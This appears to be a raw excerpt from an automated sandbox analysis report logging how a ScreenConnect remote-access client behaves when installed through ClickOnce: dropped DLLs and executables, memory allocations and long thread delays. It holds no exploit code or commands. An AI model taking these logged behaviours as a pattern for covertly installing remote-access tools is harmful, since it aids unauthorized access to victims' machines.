                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1C1E3980000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1C1FBB10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeMemory allocated: C60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeMemory allocated: 1A980000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeMemory allocated: 13E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeMemory allocated: 3380000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeMemory allocated: 1750000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeMemory allocated: 15E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeMemory allocated: 1780000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeMemory allocated: 3780000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeMemory allocated: B50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeMemory allocated: 1A760000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeMemory allocated: 1270000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeMemory allocated: 1AE60000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599888Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599776Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599666Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599540Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599425Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599314Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599177Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599049Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598907Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598538Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597621Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597510Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597377Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597240Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597117Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596942Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596825Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596714Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596602Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596491Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596379Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596268Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596026Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595917Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595805Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595693Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595581Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595322Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595212Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595103Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594899Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594758Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594636Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594503Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594264Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594151Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594039Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593929Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593817Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593701Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593587Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593367Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593259Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593147Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593035Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592908Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592742Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592633Jump to behavior
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 5822Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3261Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Windows.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsFileManager.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Client.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Core.dllJump to dropped file
